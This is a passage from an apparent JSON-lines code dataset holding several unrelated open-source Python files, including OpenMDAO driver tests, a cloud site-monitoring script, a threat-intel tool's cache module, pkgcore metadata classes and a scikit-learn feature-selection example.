100.0)*2.0)\n self.assertEqual(driver.param_low[2], (-1e5 + 1000.0)*3.0)\n self.assertEqual(driver.param_low[3], (-1e5 + 10000.0)*4.0)\n conval = prob['x'] + prob['y']\n self.assertEqual(driver.con_scaled[0], (conval[0, 0] + 10.0)*1.0)\n self.assertEqual(driver.con_scaled[1], (conval[0, 1] + 100.0)*2.0)\n self.assertEqual(driver.con_scaled[2], (conval[1, 0] + 1000.0)*3.0)\n self.assertEqual(driver.con_scaled[3], (conval[1, 1] + 10000.0)*4.0)\n\n def test_scaler_adder_array_inf(self):\n\n # make sure inf doesn't bomb out\n\n prob = Problem()\n root = prob.root = Group()\n driver = prob.driver = ScaleAddDriverArray()\n\n root.add('p1', IndepVarComp('x', val=np.array([[1.0, 1.0], [1.0, 1.0]])),\n promotes=['*'])\n root.add('comp', ArrayComp2D(), promotes=['*'])\n root.add('constraint', ExecComp('con = x + y',\n x=np.array([[1.0, 1.0], [1.0, 1.0]]),\n y=np.array([[1.0, 1.0], [1.0, 1.0]]),\n con=np.array([[1.0, 1.0], [1.0, 1.0]])),\n promotes=['*'])\n\n driver.add_desvar('x', lower=np.array([[-1e5, -1e5], [-np.inf, -1e5]]),\n upper=np.array([1e25, 1e25, np.inf, 1e25]),\n adder=np.array([[10.0, 100.0], [1000.0, 10000.0]]),\n scaler=np.array([[1.0e-2, 2.0], [3.0, 4.0e12]]))\n driver.add_objective('y', adder=np.array([[10.0, 100.0], [1000.0, 10000.0]]),\n scaler=np.array([[1.0, 2.0], [3.0, 4.0]]))\n driver.add_constraint('con', upper=np.zeros((2, 2)), adder=np.array([[10.0, 100.0], [1000.0, 10000.0]]),\n scaler=np.array([[1.0, 2.0], [3.0, 4.0]]))\n\n prob.setup(check=False)\n 
prob.run()\n\n def test_scaler_adder_array_int(self):\n\n prob = Problem()\n root = prob.root = Group()\n driver = prob.driver = ScaleAddDriverArray()\n\n root.add('p1', IndepVarComp('x', val=np.array([[1.0, 1.0], [1.0, 1.0]])),\n promotes=['*'])\n root.add('comp', ArrayComp2D(), promotes=['*'])\n root.add('constraint', ExecComp('con = x + y',\n x=np.array([[1.0, 1.0], [1.0, 1.0]]),\n y=np.array([[1.0, 1.0], [1.0, 1.0]]),\n con=np.array([[1.0, 1.0], [1.0, 1.0]])),\n promotes=['*'])\n\n driver.add_desvar('x', lower=np.array([[-1e5, -1e5], [-1e5, -1e5]]),\n adder=np.array([[10, 100], [1000, 10000]]),\n scaler=np.array([[1, 2], [3, 4]]))\n driver.add_objective('y', adder=np.array([[10, 100], [1000, 10000]]),\n scaler=np.array([[1, 2], [3, 4]]))\n driver.add_constraint('con', upper=np.zeros((2, 2)), adder=np.array([[10, 100], [1000, 10000]]),\n scaler=np.array([[1, 2], [3, 4]]))\n\n prob.setup(check=False)\n prob.run()\n\n self.assertEqual(driver.param[0], 11.0)\n self.assertEqual(driver.param[1], 202.0)\n self.assertEqual(driver.param[2], 3003.0)\n self.assertEqual(driver.param[3], 40004.0)\n self.assertEqual(prob['x'][0, 0], 12.0)\n self.assertEqual(prob['x'][0, 1], 102.0)\n self.assertEqual(prob['x'][1, 0], 2003.0)\n self.assertEqual(prob['x'][1, 1], 20250.0)\n self.assertEqual(driver.obj_scaled[0], (prob['y'][0, 0] + 10.0)*1.0)\n self.assertEqual(driver.obj_scaled[1], (prob['y'][0, 1] + 100.0)*2.0)\n self.assertEqual(driver.obj_scaled[2], (prob['y'][1, 0] + 1000.0)*3.0)\n self.assertEqual(driver.obj_scaled[3], (prob['y'][1, 1] + 10000.0)*4.0)\n self.assertEqual(driver.param_low[0], (-1e5 + 10.0)*1.0)\n self.assertEqual(driver.param_low[1], (-1e5 + 100.0)*2.0)\n self.assertEqual(driver.param_low[2], (-1e5 + 1000.0)*3.0)\n self.assertEqual(driver.param_low[3], (-1e5 + 10000.0)*4.0)\n conval = prob['x'] + prob['y']\n self.assertEqual(driver.con_scaled[0], (conval[0, 0] + 10.0)*1.0)\n self.assertEqual(driver.con_scaled[1], (conval[0, 1] + 100.0)*2.0)\n self.assertEqual(driver.con_scaled[2], (conval[1, 0] + 1000.0)*3.0)\n self.assertEqual(driver.con_scaled[3], (conval[1, 1] + 10000.0)*4.0)\n\n J = driver.calc_gradient(['x'], ['y', 'con'])\n Jbase = np.array([[ 2., 1., 3., 7.],\n [ 4., 2., 6., 5.],\n [ 3., 6., 9., 8.],\n [ 1., 3., 2., 4.],\n [ 3., 1., 3., 7.],\n [ 4., 3., 6., 5.],\n [ 3., 6., 10., 8.],\n [ 1., 3., 2., 5.]])\n assert_rel_error(self, J, Jbase, 1e-6)\n\n def test_array_scaler_bug(self):\n\n class Paraboloid(Component):\n\n def __init__(self):\n super(Paraboloid, self).__init__()\n\n self.add_param('X', val=np.array([0.0, 0.0]))\n self.add_output('f_xy', val=0.0)\n\n def solve_nonlinear(self, params, unknowns, resids):\n X = params['X']\n x = X[0]\n y = X[1]\n unknowns['f_xy'] = (1000.*x-3.)**2 + (1000.*x)*(0.01*y) + (0.01*y+4.)**2 - 3.\n\n def linearize(self, params, unknowns, resids):\n \"\"\" Jacobian for our paraboloid.\"\"\"\n X = params['X']\n J = {}\n\n x = X[0]\n y = X[1]\n\n J['f_xy', 'X'] = np.array([[ 2000000.0*x - 6000.0 + 10.0*y,\n 0.0002*y + 0.08 + 10.0*x]])\n return J\n\n top = Problem()\n\n root = top.root = Group()\n root.deriv_options['type'] = 'fd'\n\n root.add('p1', IndepVarComp('X', np.array([3.0, -4.0])))\n root.add('p', Paraboloid())\n\n root.connect('p1.X', 'p.X')\n\n top.driver = ScipyOptimizer()\n top.driver.options['optimizer'] = 'SLSQP'\n top.driver.options['tol'] = 1e-12\n\n top.driver.add_desvar('p1.X',\n lower=np.array([-1000.0, -1000.0]),\n upper=np.array([1000.0, 1000.0]),\n scaler=np.array([1000., 0.01]))\n top.driver.add_objective('p.f_xy')\n\n 
top.setup(check=False)\n top.run()\n\n # Optimal solution (minimum): x = 6.6667; y = -7.3333\n # Note: this scaling isn't so great, but at least we know it works\n # and the bug is fixed.\n assert_rel_error(self, top['p1.X'][0], 6.666667/1000.0, 1e-3)\n assert_rel_error(self, top['p1.X'][1], -7.333333/0.01, 1e-3)\n\n def test_driver_unicode_variable(self):\n # this tests that unicode design variables and objectives works in python 2.\n prob = Problem(root=Group())\n root = prob.root\n\n # simple paraboloid example from tutorial\n root.add('p1', IndepVarComp('x0', 3.0), promotes=['*'])\n root.add('p2', IndepVarComp('y0', -4.0), promotes=['*'])\n root.add('p', ExecComp('f_xy = (x0 - 3.0)**2 + x0 * y0 + (y0 + 4.0)**2 - 3.0'), promotes=['*'])\n\n prob.driver = ScipyOptimizer()\n prob.driver.options['optimizer'] = 'SLSQP'\n\n prob.driver.add_desvar(u'x0', lower=-50, upper=50)\n prob.driver.add_desvar(u'y0', lower=-50, upper=50)\n prob.driver.add_objective(u'f_xy')\n prob.driver.options['disp'] = False\n\n prob.setup(check=False)\n\n prob['x0'] = 3.0\n prob['y0'] = -4.0\n\n prob.run()\n\n assert_rel_error(self, prob['f_xy'], -27.33333, 1e-3)\n\n def test_eq_ineq_error_messages(self):\n\n prob = Problem()\n root = prob.root = SellarDerivatives()\n\n prob.driver = MySimpleDriver()\n\n with self.assertRaises(RuntimeError) as cm:\n prob.driver.add_constraint('con1')\n\n self.assertEqual(str(cm.exception), \"Constraint 'con1' needs to define lower, upper, or equals.\")\n\n with self.assertRaises(RuntimeError) as cm:\n prob.driver.add_constraint('con1', lower=0.0, upper=1.1, equals=2.2)\n\n self.assertEqual(str(cm.exception), \"Constraint 'con1' cannot be both equality and inequality.\")\n\n # Don't try this at home, kids\n prob.driver.supports['two_sided_constraints'] = False\n\n with self.assertRaises(RuntimeError) as cm:\n prob.driver.add_constraint('con1', lower=0.0, upper=1.1)\n\n self.assertEqual(str(cm.exception), \"Driver does not support 2-sided constraint 'con1'.\")\n\n # Don't try this at home, kids\n prob.driver.supports['equality_constraints'] = False\n\n with self.assertRaises(RuntimeError) as cm:\n prob.driver.add_constraint('con1', equals=0.0)\n\n self.assertEqual(str(cm.exception), \"Driver does not support equality constraint 'con1'.\")\n\n # Don't try this at home, kids\n prob.driver.supports['inequality_constraints'] = False\n\n with self.assertRaises(RuntimeError) as cm:\n prob.driver.add_constraint('con1', upper=0.0)\n\n self.assertEqual(str(cm.exception), \"Driver does not support inequality constraint 'con1'.\")\n\n def test_index_error_messages_param(self):\n\n prob = Problem()\n prob.root = Group()\n prob.root.deriv_options['type'] = 'fd'\n prob.root.ln_solver.options['mode'] = 'auto'\n\n prob.root.add('myparams', IndepVarComp('x', np.zeros(4)))\n prob.root.add('rosen', Rosenbrock(4))\n\n prob.root.connect('myparams.x', 'rosen.x')\n\n prob.driver = MySimpleDriver()\n prob.driver.add_desvar('myparams.x', indices=[0, 3, 4])\n prob.driver.add_objective('rosen.f')\n\n prob.setup(check=False)\n\n # Make sure we can't do this\n with self.assertRaises(IndexError) as cm:\n prob.run()\n\n msg = \"Index for design var 'myparams.x' is out of bounds. 
\"\n msg += \"Requested index: [0 3 4], \"\n msg += \"shape: (4,).\"\n raised_error = str(cm.exception)\n raised_error = raised_error.replace('(4L,', '(4,')\n self.assertEqual(msg, raised_error)\n\n def test_index_error_messages_obj(self):\n\n prob = Problem()\n prob.root = Group()\n prob.root.deriv_options['type'] = 'fd'\n prob.root.ln_solver.options['mode'] = 'auto'\n\n prob.root.add('myparams', IndepVarComp('x', np.zeros(4)))\n prob.root.add('rosen', Rosenbrock(4))\n\n prob.root.connect('myparams.x', 'rosen.x')\n\n prob.driver = MySimpleDriver()\n prob.driver.add_desvar('myparams.x')\n prob.driver.add_objective('rosen.xxx', indices=[4])\n\n prob.setup(check=False)\n\n # Make sure we can't do this\n with self.assertRaises(IndexError) as cm:\n prob.run()\n\n msg = \"Index for objective 'rosen.xxx' is out of bounds. \"\n msg += \"Requested index: [4], \"\n msg += \"shape: (4,).\"\n raised_error = str(cm.exception)\n raised_error = raised_error.replace('(4L,', '(4,')\n self.assertEqual(msg, raised_error)\n\n def test_index_error_messages_con(self):\n\n prob = Problem()\n prob.root = Group()\n prob.root.deriv_options['type'] = 'fd'\n prob.root.ln_solver.options['mode'] = 'auto'\n\n prob.root.add('myparams', IndepVarComp('x', np.zeros(4)))\n prob.root.add('rosen', Rosenbrock(4))\n\n prob.root.connect('myparams.x', 'rosen.x')\n\n prob.driver = MySimpleDriver()\n prob.driver.add_desvar('myparams.x')\n prob.driver.add_constraint('rosen.xxx', upper=0.0, indices=[4])\n\n prob.setup(check=False)\n\n # Make sure we can't do this\n with self.assertRaises(IndexError) as cm:\n prob.run()\n\n msg = \"Index for constraint 'rosen.xxx' is out of bounds. \"\n msg += \"Requested index: [4], \"\n msg += \"shape: (4,).\"\n raised_error = str(cm.exception)\n raised_error = raised_error.replace('(4L,', '(4,')\n self.assertEqual(msg, raised_error)\n\n def test_add_duplicate(self):\n\n prob = Problem()\n root = prob.root = SellarDerivatives()\n\n prob.driver = MySimpleDriver()\n\n # For this test only assume the driver supports multiple objectives\n prob.driver.supports['multiple_objectives'] = True\n\n\n prob.driver.add_desvar('z', lower=-100.0, upper=100.0)\n\n prob.driver.add_objective('obj')\n prob.driver.add_constraint('con1', upper=0.0)\n\n # Add duplicate desvar\n with self.assertRaises(RuntimeError) as cm:\n prob.driver.add_desvar('z', lower=-50.0, upper=49.0)\n\n msg = \"Desvar 'z' already exists.\"\n raised_error = str(cm.exception)\n self.assertEqual(msg, raised_error)\n\n # Add duplicate constraint\n with self.assertRaises(RuntimeError) as cm:\n prob.driver.add_constraint('con1', upper=0.0)\n\n msg = \"Constraint 'con1' already exists.\"\n raised_error = str(cm.exception)\n self.assertEqual(msg, raised_error)\n\n # Add duplicate objective\n with self.assertRaises(RuntimeError) as cm:\n prob.driver.add_objective('obj')\n\n msg = \"Objective 'obj' already exists.\"\n raised_error = str(cm.exception)\n self.assertEqual(msg, raised_error)\n\n def test_unsupported_multiple_obj(self):\n prob = Problem()\n prob.root = SellarDerivatives()\n\n prob.driver = MySimpleDriver()\n prob.driver.add_desvar('z', lower=-100.0, upper=100.0)\n\n prob.driver.add_objective('obj')\n\n # Add duplicate objective\n with self.assertRaises(RuntimeError) as cm:\n prob.driver.add_objective('x')\n\n msg = \"Attempted to add multiple objectives to a driver that does not \" \\\n \"support multiple objectives.\"\n raised_error = str(cm.exception)\n self.assertEqual(msg, raised_error)\n\n def test_no_desvar_bound(self):\n\n prob = 
Problem()\n root = prob.root = SellarDerivatives()\n\n prob.driver = MySimpleDriver()\n prob.driver.add_desvar('z')\n\n prob.setup(check=False)\n\n meta = prob.driver._desvars['z']\n self.assertLess(meta['lower'], -1e12)\n self.assertGreater(meta['upper'], 1e12)\n\n def test_set_desvar_index(self):\n\n # This tests a feature added by kilojoules.\n\n prob = Problem()\n root = prob.root = Group()\n driver = prob.driver = ScaleAddDriverArray()\n\n root.add('p1', IndepVarComp('x', val=np.array([1.0, 1.0, 1.0, 1.0])),\n promotes=['*'])\n root.add('p2', IndepVarComp('y', val=np.array([1.0, 1.0, 1.0, 1.0])),\n promotes=['*'])\n root.add('constraint', ExecComp('con = x + y',\n x=np.array([1.0, 1.0, 1.0, 1.0]),\n y=np.array([1.0, 1.0, 1.0, 1.0]),\n con=np.array([1.0, 1.0, 1.0, 1.0])),\n promotes=['*'])\n\n driver.add_desvar('x', lower=np.array([-1e5, -1e5, -1e5, -1e5]),\n upper=np.array([1e25, 1e25, 1e25, 1e25]),\n adder=np.array([10.0, 100.0, 1000.0, 10000.0]),\n scaler=np.array([1.0, 2.0, 3.0, 4.0]))\n driver.add_objective('y', adder=np.array([10.0, 100.0, 1000.0, 10000.0]),\n scaler=np.array([1.0, 2.0, 3.0, 4.0]))\n driver.add_constraint('con', upper=np.zeros((4, )), adder=np.array([10.0, 100.0, 1000.0, 10000.0]),\n scaler=np.array([1.0, 2.0, 3.0, 4.0]))\n\n prob.setup(check=False)\n\n x = driver.get_desvars()['x'][2]\n assert_rel_error(self, x, (1.0+1000)*3, 1e-6)\n driver.set_desvar('x', 99.0, index=2)\n x = driver.get_desvars()['x'][2]\n assert_rel_error(self, x, 99.0, 1e-6)\n\n\nclass TestDeprecated(unittest.TestCase):\n def test_deprecated_add_param(self):\n with warnings.catch_warnings(record=True) as w:\n # Cause all warnings to always be triggered.\n warnings.simplefilter(\"always\")\n\n # Trigger a warning.\n p = Problem()\n p.driver.add_param('x', 1.0)\n\n self.assertEqual(len(w), 1)\n self.assertEqual(str(w[0].message),\n 'Driver.add_param() is deprecated. 
Use add_desvar() instead.')\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"OpenMDAO/OpenMDAO1","sub_path":"openmdao/core/test/test_driver_interface.py","file_name":"test_driver_interface.py","file_ext":"py","file_size_in_byte":26330,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"44"} +{"seq_id":"29232053584","text":"\"\"\"\n\nBy Allen Tao\nCreated at 2023/02/10 15:36\n\"\"\"\nfrom dotenv import load_dotenv\n\nload_dotenv(verbose=True)\n_data = {}\n\n\ndef create_test_client():\n from main import app\n\n return app.test_client()\n\n\nBASE_URL = 'http://localhost:5000'\nclient = create_test_client()\n","repo_name":"qiuying-rpa/console","sub_path":"tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"22522515615","text":"from fsmLogic.nodeClasses.actionTemplate import Action\nfrom fsmLogic.actionManager import ActionManager\nfrom fsmLogic.nodeClasses.inputs import ValueInput, EventOutput, ValueOutput\nfrom fsmLogic.nodeClasses.valueTypes import ValueType\n\n\n@ActionManager.actionclass\nclass GetChannel(Action):\n guildID = -1\n group = \"Values\"\n templID = 57\n inputs = [\n ValueInput(\"channel ID\", ValueType.Number)\n ]\n outputs = [\n ValueOutput(\"channel\", ValueType.Structure, \"id (Number)\\ncreated at (Datetime)\\nname (Text)\\nmention (Text)\\ncategory ID (Number)\")\n ]\n outEvents = [\n EventOutput(\"completed\"),\n EventOutput(\"error\")\n ]\n\n def __init__(self):\n super().__init__()\n super().addConnections(self.__class__.inputs, self.__class__.outputs, self.__class__.outEvents)\n\n async def execute(self, client, guild):\n values = super().getValues()\n super().checkValues(values)\n from Bot.utils import formatChannel\n import datetime\n ch = guild.get_channel(values[0])\n if not ch:\n client.errMsg[guild.id] = \"[GetChannel - \" + datetime.datetime.now().strftime(\"%m/%d/%Y, %H:%M:%S\") + \"] Could not find channel\"\n return super().sendEvent(1)\n super().setValue(formatChannel(ch), 0)\n return super().sendEvent(0)\n\n @classmethod\n def getTemplate(cls):\n return super().getTemplate(cls)\n","repo_name":"AsperTheDog/NeoSkeletonBot","sub_path":"backend/fsmLogic/actionCodes/action_getChannel.py","file_name":"action_getChannel.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"6392315200","text":"#!/usr/bin/env python\n#coding=utf-8\nimport sys\nfrom aliyunsdkcore.client import AcsClient\nfrom aliyunsdkcore.acs_exception.exceptions import ClientException\nfrom aliyunsdkcore.acs_exception.exceptions import ServerException\nfrom aliyunsdkcms.request.v20190101.DescribeSiteMonitorDataRequest import DescribeSiteMonitorDataRequest\nimport json\n\n\nclient = AcsClient('<accessKey>',\n '<accessSecret>', 'cn-hangzhou')\n\n# We monitored over the weekend (Sat and Sun)\ndef DescribeSiteMonitorData (taskId, metricName):\n request = DescribeSiteMonitorDataRequest()\n request.set_accept_format('json')\n request.set_MetricName(metricName)\n request.set_TaskId(taskId)\n request.set_StartTime(\"2021-03-06T00:00:00Z\")\n request.set_EndTime(\"2021-03-07T23:59:59Z\")\n response = client.do_action_with_exception(request)\n return response \n\n\n\nGaResponse = DescribeSiteMonitorData('ce8f0758-90ca-4436-8de0-e5bdac023b58', 'ResponseTime')\nGaAvailability = 
DescribeSiteMonitorData('ce8f0758-90ca-4436-8de0-e5bdac023b58', 'Availability') \nInternetResponse = DescribeSiteMonitorData('d4ea0e26-a227-4006-8bad-0781556000b3', 'ResponseTime')\nInternetAvailability = DescribeSiteMonitorData('d4ea0e26-a227-4006-8bad-0781556000b3', 'Availability')\n\n#Response time\ndef getResponse(ResponseData):\n parse = json.loads(ResponseData)\n parseResponse = parse.get('Data')\n res = []\n for list in parseResponse:\n res.append(list.get('Average'))\n \n print(sum(res)/len(res))\n res = []\n\n\n# Availability\ndef getAvailability(AvailabilityData):\n parse1 = json.loads(AvailabilityData)\n parseAvailability = parse1.get('Data')\n ava = []\n for list in parseAvailability:\n ava.append(list.get('Availability'))\n print(sum(ava)/len(ava))\n ava = []\n \n# MaxResponse\ndef getMaxResponse(ResponseData):\n parse = json.loads(ResponseData)\n parseResponse = parse.get('Data')\n maximum = []\n for list in parseResponse:\n maximum.append(list.get('Average'))\n print(max(maximum))\n res = []\n\n# MinResponse\ndef getMinResponse(ResponseData):\n parse = json.loads(ResponseData)\n parseResponse = parse.get('Data')\n minimum = []\n for list in parseResponse:\n minimum.append(list.get('Average'))\n print(min(minimum))\n res = []\n \n# Get GA avg/max/min response time\ngetResponse(GaResponse)\ngetMaxResponse(GaResponse)\ngetMinResponse(GaResponse)\n\n# Get Internet avg/max/min response time\ngetResponse(InternetResponse)\ngetMaxResponse(InternetResponse)\ngetMinResponse(InternetResponse)\n\n# Get GA and Internet availablity\ngetAvailability(GaAvailability)\ngetAvailability(InternetAvailability)\n","repo_name":"alibabacloudkorea/ACKC","sub_path":"cms_sitemonitoring_query.py","file_name":"cms_sitemonitoring_query.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"11806682730","text":"from os import chmod, mkdir, makedirs, remove, stat\nfrom os.path import exists, isdir\nfrom requests.exceptions import ConnectionError, ReadTimeout\nfrom time import mktime\nimport datetime\nimport requests\nimport sys\n\nfrom BTG.lib.config_parser import Config\nfrom BTG.lib.io import module as mod\n\n\nclass Cache:\n def __init__(self, module_name, url, filename, search_method):\n self.config = Config.get_instance()\n self.module_name = module_name\n self.url = url\n self.filename = self.new_filename = filename\n self.temp_folder = \"%s%s/\" % (self.config[\"temporary_cache_path\"], self.module_name)\n position = 0\n filename_copy = self.filename\n if not self.filename.isalnum():\n filename_copy = self.filename.replace(\"_\", \"\")\n for pos, char in enumerate(filename_copy):\n if not char.isalnum() and char != '.':\n position = pos\n self.new_filename = filename_copy[position:]\n self.temp_file = \"%s%s\" % (self.temp_folder, self.new_filename)\n\n self.createModuleFolder()\n if self.checkIfNotUpdate():\n if mod.allowedToSearch(search_method):\n self.downloadFile()\n else:\n raise NameError(\"Offline parameter is set on, cannot refresh outdated cache\")\n return None\n self.content = self.getContent()\n\n def getContent(self):\n f = \"\"\n if exists(self.temp_file):\n try:\n f = open(self.temp_file, encoding=\"ISO-8859-1\").read()\n except:\n f = open(self.temp_file).read()\n return f\n\n def downloadFile(self):\n \"\"\"\n Get file from web\n \"\"\"\n mod.display(\"%s.cache\" % self.module_name,\n message_type=\"DEBUG\",\n string=\"Update %s%s\" % (self.url, self.filename))\n full_url = \"%s%s\" 
% (self.url, self.filename)\n try:\n r = requests.get(\n full_url,\n stream=True, headers=self.config[\"user_agent\"],\n proxies=self.config[\"proxy_host\"],\n timeout=self.config[\"requests_timeout\"]\n )\n except ConnectionError as e:\n mod.display(\"%s.cache\" % self.module_name,\n message_type=\"ERROR\",\n string=e)\n return\n except ReadTimeout as e:\n mod.display(\"%s.cache\" % self.module_name,\n message_type=\"ERROR\",\n string=\"Timeout: %s\" % (full_url))\n return\n except:\n raise\n if r.status_code == 200:\n if not exists(\"%s.lock\" % self.temp_file):\n open(\"%s.lock\" % self.temp_file, 'a').close()\n chmod(\"%s.lock\" % self.temp_file, 0o666)\n if exists(self.temp_file):\n to_chmod = False\n else:\n to_chmod = True\n with open(self.temp_file, 'wb') as f:\n for chunk in r:\n f.write(chunk)\n if to_chmod:\n chmod(self.temp_file, 0o666)\n try:\n remove(\"%s.lock\" % self.temp_file)\n except:\n raise\n elif self.module_name == \"malshare\" and r.status_code == 404:\n # When we have a 404 from malshare it is a valid negative response\n raise NameError('Hash not found on malshare, it is alright')\n else:\n raise ValueError(r.status_code)\n # mod.display(\"%s.cache\" % self.module_name,\n # \"ERROR\",\n # \"Response code: %s | %s\" % (r.status_code, full_url))\n\n def checkIfNotUpdate(self):\n \"\"\"\n True: Need to be updated\n False: Nothing to do\n \"\"\"\n if exists(self.temp_file):\n if not self.compareUpdatedDate():\n return False\n return True\n\n def compareUpdatedDate(self):\n \"\"\"\n Compare date now and edited date\n \"\"\"\n if self.config[\"temporary_cache_update\"] <= 0:\n return False\n date_to_compare = datetime.datetime.now() - datetime.timedelta(seconds=self.config[\"temporary_cache_update\"]*60)\n last_update = stat(self.temp_file).st_mtime\n if last_update < int(mktime(date_to_compare.timetuple())):\n # Need to update\n return True\n # Don't need\n return False\n\n def createModuleFolder(self):\n if not isdir(self.config[\"temporary_cache_path\"]):\n try:\n makedirs(self.config[\"temporary_cache_path\"])\n except:\n mod.display(\"%s.cache\" % self.module_name,\n \"FATAL_ERROR\",\n \"Unable to create %s directory. 
(Permission denied)\" % self.config[\"temporary_cache_path\"])\n sys.exit()\n chmod(self.config[\"temporary_cache_path\"], 0o770)\n if not isdir(self.temp_folder):\n mkdir(self.temp_folder)\n chmod(self.temp_folder, 0o770)\n","repo_name":"conix-security/BTG","sub_path":"BTG/lib/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":5164,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"44"} +{"seq_id":"12664386453","text":"__all__ = (\"DeriveMetadataKls\", \"factory\", \"package\")\n\nfrom snakeoil import klass, weakrefs\n\nfrom pkgcore.ebuild import cpv\nfrom pkgcore.ebuild.atom import atom\nfrom pkgcore.package import base\n\n\ndef DeriveMetadataKls(original_kls):\n if getattr(original_kls, \"_derived_metadata_kls\", False):\n return original_kls\n\n class package(original_kls):\n _derived_metadata_kls = True\n built = False\n __slots__ = (\"_parent\", \"data\")\n try:\n __doc__ = \"package class with metadata bound to it for attribute \" \\\n \"generation\\n\\n\" + \\\n \"\\n\".join(x.lstrip()\n for x in original_kls.__doc__.split(\"\\n\")\n if \":ivar\" in x or \":cvar\" in x)\n __doc__ += \"\\n:ivar repo: parent repository\"\n except AttributeError:\n # wee, must be in -OO mode.\n __doc__ = None\n\n immutable = True\n package_is_real = True\n\n _get_attr = dict(original_kls._get_attr)\n\n def __init__(self, parent_repository, *a, **kwds):\n \"\"\"\n wrapper for %s.__init__; see %s.__init__ for allowed args/kwds,\n they're passed directly to it\n\n :param parent_repository: parent repository this package belongs to\n :type parent_repository: :obj:`pkgcore.repository.prototype.tree`\n instance\n \"\"\" % (original_kls, original_kls)\n original_kls.__init__(self, *a, **kwds)\n object.__setattr__(self, \"_parent\", parent_repository)\n\n def _get_data(self):\n \"\"\"\n internal hook func to get the packages metadata, consumer\n of :obj:`_get_attr`\n \"\"\"\n return self._fetch_metadata()\n _get_attr[\"data\"] = _get_data\n\n __getattr__ = base.dynamic_getattr_dict\n\n repo = klass.alias_attr(\"_parent._parent_repo\")\n\n def release_cached_data(self, all=False):\n for x in self._get_attr:\n try:\n object.__delattr__(self, x)\n except AttributeError:\n pass\n\n if all:\n try:\n object.__delattr__(self, 'data')\n except AttributeError:\n pass\n\n @property\n def slotted_atom(self):\n return atom(\"%s:%s\" % (self.key, self.slot))\n\n def _fetch_metadata(self):\n \"\"\"\n pull the metadata for this package.\n must be overridden in derivative\n \"\"\"\n raise NotImplementedError\n\n def add_format_triggers(self, op_inst, format_op_inst, engine_inst):\n pass\n\n return package\n\npackage = DeriveMetadataKls(cpv.versioned_CPV_cls)\n\nclass factory(object):\n\n \"\"\"\n package generator\n\n does weakref caching per repository\n\n :cvar child_class: callable to generate packages\n \"\"\"\n\n child_class = package\n\n def __init__(self, parent_repo):\n self._parent_repo = parent_repo\n self._cached_instances = weakrefs.WeakValCache()\n\n def new_package(self, *args):\n \"\"\"\n generate a new package instance\n\n \"\"\"\n inst = self._cached_instances.get(args)\n if inst is None:\n inst = self._cached_instances[args] = self.child_class(self, *args)\n return inst\n\n def __call__(self, *args, **kwds):\n return self.new_package(*args, **kwds)\n\n def clear(self):\n \"\"\"\n wipe the weakref cache of packages instances\n \"\"\"\n self._cached_instances.clear()\n\n def _get_metadata(self, *args):\n \"\"\"Pulls metadata from the 
repo/cache/wherever.\n\n Must be overridden in derivatives.\n \"\"\"\n raise NotImplementedError\n\n def _update_metadata(self, *args):\n \"\"\"Updates metadata in the repo/cache/wherever.\n\n Must be overridden in derivatives.\"\"\"\n raise NotImplementedError\n","repo_name":"pombreda/pkgcore","sub_path":"pkgcore/package/metadata.py","file_name":"metadata.py","file_ext":"py","file_size_in_byte":3945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74928964934","text":"from sklearn.datasets import make_classification\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.feature_selection import SelectKBest\n\n# Criacao do conjunto de dados\nX, Y = make_classification(n_samples=1000, n_informative=10,\n n_redundant=10, random_state=42) # usa o random state para usar a mesma base de dados, nao aleatorio\n\n# Classificador Arvore de Decisao\narvore = DecisionTreeClassifier(random_state=42, max_depth=7)\n\n# Classificacao de Dados Originais\narvore.fit(X, Y)\nacuracia = arvore.score(X, Y)\nprint('Numero de atributos originais: ', X.shape[1])\nprint('Acuracia (dados originais): ', acuracia)\n\n# Aplicacao do PCA\nselecionador = SelectKBest(k=10) # numero de atributos que quer reduzir\nX = selecionador.fit_transform(X, Y)\n\n# Classificacao dos dados PCA\narvore.fit(X, Y)\nacuracia = arvore.score(X, Y)\nprint('\\nNumero de atributos selecionados: ', X.shape[1])\nprint('Acuracia (apos selecao):', acuracia)","repo_name":"area-41/Mineracao_de_Dados","sub_path":"PreProcessamento/ReducaoDimSelectKBest.py","file_name":"ReducaoDimSelectKBest.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"18623107845","text":"\nfrom doc.models import Rahbari, RahbariGraph, RahbariGraphType, RahbariLabel\nimport numpy as np\nimport after_response\n\nlabel_node_color = \"#009999\"\ndocument_node_color = \"#00CC66\"\n\n@after_response.enable\ndef apply():\n # CoLabelsGraph()\n # DocumentLabelGraph()\n DocumentDocumentGraph()\n print(\"Done...\")\n\n\ndef CoLabelsGraph():\n graph_name = \"گراف باهم‌آیی برچسب‌ها\"\n graph_en_name = \"CoLabelsGraph\"\n RahbariGraph.objects.filter(type__en_name=graph_en_name).delete()\n RahbariGraphType.objects.filter(en_name=graph_en_name).delete()\n\n graph_type = RahbariGraphType.objects.create(name=graph_name, en_name=graph_en_name)\n\n rahbari_document_list = Rahbari.objects.all()\n labels_dict = {}\n b = 0\n for doc in rahbari_document_list:\n print(\"1.1.\", b/rahbari_document_list.__len__())\n doc_labels = doc.labels.split(\"؛ \")\n for label in doc_labels:\n if len(label.replace(\" \", \"\")) > 0:\n label = label.replace('؛', '').replace(\"ائمه جمعه\", \"ائمه‌ جمعه\").replace(\"ورزش‌کاران\", \"ورزشکاران\")\n try:\n label_object = RahbariLabel.objects.get(name=label)\n label_name = label_object.name\n label_id = label_object.id\n label = str(label_id) + \"_\" + label_name\n if label not in labels_dict:\n labels_dict[label] = [doc.id]\n else:\n labels_dict[label].append(doc.id)\n except:\n print(label)\n b+=1\n\n\n labels_list = 